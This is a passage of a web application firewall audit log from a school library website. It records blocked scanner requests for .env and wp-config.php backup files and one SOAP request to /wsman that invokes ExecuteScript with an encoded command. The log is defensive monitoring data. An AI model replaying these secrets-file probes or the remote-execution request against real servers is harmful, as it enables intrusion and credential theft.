139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603460 --883e2c46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --883e2c46-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992478933666 905 (- - -) Stopwatch2: 1748992478933666 905; combined=353, p1=313, p2=0, p3=0, p4=0, p5=40, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --883e2c46-Z-- --f86e3676-A-- [04/Jun/2025:06:14:39 +0700] aD-B35LmnxTwEPX7IubOxQAAAIg 103.236.140.4 44010 103.236.140.4 8181 --f86e3676-B-- GET /.env.public.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521334 --f86e3676-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f86e3676-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992479622107 689 (- - -) Stopwatch2: 1748992479622107 689; combined=271, p1=238, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f86e3676-Z-- --39251d3a-A-- [04/Jun/2025:06:14:42 +0700] aD-B4l_DvM40jZomokt-HQAAABg 103.236.140.4 44014 103.236.140.4 8181 --39251d3a-B-- GET /.env.qa.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603463 --39251d3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --39251d3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992482282030 728 (- - -) Stopwatch2: 1748992482282030 728; combined=291, p1=254, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39251d3a-Z-- --c34f9408-A-- [04/Jun/2025:06:14:46 +0700] aD-B5thPZJx8OfNaLCowmgAAANY 103.236.140.4 44018 103.236.140.4 8181 --c34f9408-B-- GET /.env.sample.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603466 --c34f9408-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c34f9408-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992486252666 942 (- - -) Stopwatch2: 1748992486252666 942; combined=367, p1=327, p2=0, p3=0, p4=0, p5=40, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c34f9408-Z-- --bf645f59-A-- [04/Jun/2025:06:14:50 +0700] aD-B6thPZJx8OfNaLCowmwAAANc 103.236.140.4 44022 103.236.140.4 8181 --bf645f59-B-- GET /.env.save.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603469 --bf645f59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bf645f59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992490761426 786 (- - -) Stopwatch2: 1748992490761426 786; combined=322, p1=285, p2=0, p3=0, p4=0, p5=36, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf645f59-Z-- --0219556d-A-- [04/Jun/2025:06:15:04 +0700] aD-B-DNXNn6zAsHj7JAXKgAAAFc 103.236.140.4 44026 103.236.140.4 8181 --0219556d-B-- GET /.env.stag.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521337 --0219556d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0219556d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992504458864 908 (- - -) Stopwatch2: 1748992504458864 908; combined=374, p1=334, p2=0, p3=0, p4=0, p5=40, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0219556d-Z-- --0ad22b67-A-- [04/Jun/2025:06:15:10 +0700] aD-B_thPZJx8OfNaLCownAAAAMA 103.236.140.4 44030 103.236.140.4 8181 --0ad22b67-B-- GET /.env.stage.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603472 --0ad22b67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0ad22b67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992510284195 795 (- - -) Stopwatch2: 1748992510284195 795; combined=302, p1=262, p2=0, p3=0, p4=0, p5=39, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ad22b67-Z-- --05353206-A-- [04/Jun/2025:06:15:13 +0700] aD-CAdhPZJx8OfNaLCownQAAAMI 103.236.140.4 44034 103.236.140.4 8181 --05353206-B-- GET /.env.staging.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521340 --05353206-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --05353206-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992513176393 664 (- - -) Stopwatch2: 1748992513176393 664; combined=257, p1=227, p2=0, p3=0, p4=0, p5=30, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05353206-Z-- --9b695660-A-- [04/Jun/2025:06:15:13 +0700] aD-CAZLmnxTwEPX7IubOxgAAAIw 103.236.140.4 44038 103.236.140.4 8181 --9b695660-B-- GET /.env.test.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603475 --9b695660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9b695660-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992513994027 929 (- - -) Stopwatch2: 1748992513994027 929; combined=353, p1=311, p2=0, p3=0, p4=0, p5=42, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b695660-Z-- --c1e4e001-A-- [04/Jun/2025:06:15:14 +0700] aD-CAjNXNn6zAsHj7JAXKwAAAEE 103.236.140.4 44042 103.236.140.4 8181 --c1e4e001-B-- GET /.env.testing.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521343 --c1e4e001-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c1e4e001-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992514634677 805 (- - -) Stopwatch2: 1748992514634677 805; combined=307, p1=268, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1e4e001-Z-- --c8a3ef4a-A-- [04/Jun/2025:06:15:15 +0700] aD-CAzNXNn6zAsHj7JAXLAAAAEA 103.236.140.4 44046 103.236.140.4 8181 --c8a3ef4a-B-- GET /.env1.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603478 --c8a3ef4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c8a3ef4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992515924882 696 (- - -) Stopwatch2: 1748992515924882 696; combined=275, p1=243, p2=0, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8a3ef4a-Z-- --a229e74e-A-- [04/Jun/2025:06:15:21 +0700] aD-CCdhPZJx8OfNaLCowngAAAMU 103.236.140.4 44050 103.236.140.4 8181 --a229e74e-B-- GET /.env2.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521346 --a229e74e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a229e74e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992521953661 881 (- - -) Stopwatch2: 1748992521953661 881; combined=360, p1=310, p2=0, p3=0, p4=0, p5=50, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a229e74e-Z-- --3eb68f69-A-- [04/Jun/2025:06:15:23 +0700] aD-CC5LmnxTwEPX7IubOyAAAAI8 103.236.140.4 44054 103.236.140.4 8181 --3eb68f69-B-- GET /.env_dev.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521349 --3eb68f69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3eb68f69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992523981710 646 (- - -) Stopwatch2: 1748992523981710 646; combined=292, p1=256, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3eb68f69-Z-- --d898ee54-A-- [04/Jun/2025:06:15:26 +0700] aD-CDpLmnxTwEPX7IubOyQAAAJI 103.236.140.4 44060 103.236.140.4 8181 --d898ee54-B-- GET /.env_prod.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603484 --d898ee54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d898ee54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992526513723 680 (- - -) Stopwatch2: 1748992526513723 680; combined=264, p1=231, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d898ee54-Z-- --51b99f6e-A-- [04/Jun/2025:06:15:32 +0700] aD-CFJLmnxTwEPX7IubOygAAAJE 103.236.140.4 44064 103.236.140.4 8181 --51b99f6e-B-- GET /.environment.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521352 --51b99f6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --51b99f6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992532003980 681 (- - -) Stopwatch2: 1748992532003980 681; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51b99f6e-Z-- --70474854-A-- [04/Jun/2025:06:25:49 +0700] aD-EfZLmnxTwEPX7IubPDgAAAJc 103.236.140.4 44640 103.236.140.4 8181 --70474854-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172603754 --70474854-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --70474854-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --70474854-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748993149086710 4405 (- - -) Stopwatch2: 1748993149086710 4405; combined=2669, p1=552, p2=2022, p3=30, p4=36, p5=28, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70474854-Z-- --2db96177-A-- [04/Jun/2025:06:27:29 +0700] aD-E4ZLmnxTwEPX7IubPGwAAAI8 103.236.140.4 44818 103.236.140.4 8181 --2db96177-B-- GET /.wp-config.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172786350 --2db96177-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2db96177-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748993249549387 955 (- - -) Stopwatch2: 1748993249549387 955; combined=407, p1=374, p2=0, p3=0, p4=0, p5=33, sr=156, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2db96177-Z-- --41208d65-A-- [04/Jun/2025:06:27:37 +0700] aD-E6dhPZJx8OfNaLCow8AAAAMg 103.236.140.4 44828 103.236.140.4 8181 --41208d65-B-- GET /.wp-config.php.swm HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172786353 --41208d65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --41208d65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748993257927488 884 (- - -) Stopwatch2: 1748993257927488 884; combined=366, p1=324, p2=0, p3=0, p4=0, p5=41, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41208d65-Z-- --b5a9cb7c-A-- [04/Jun/2025:06:27:49 +0700] aD-E9dhPZJx8OfNaLCow8gAAAMs 103.236.140.4 44832 103.236.140.4 8181 --b5a9cb7c-B-- GET /.wp-config.php.swn HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172786356 --b5a9cb7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 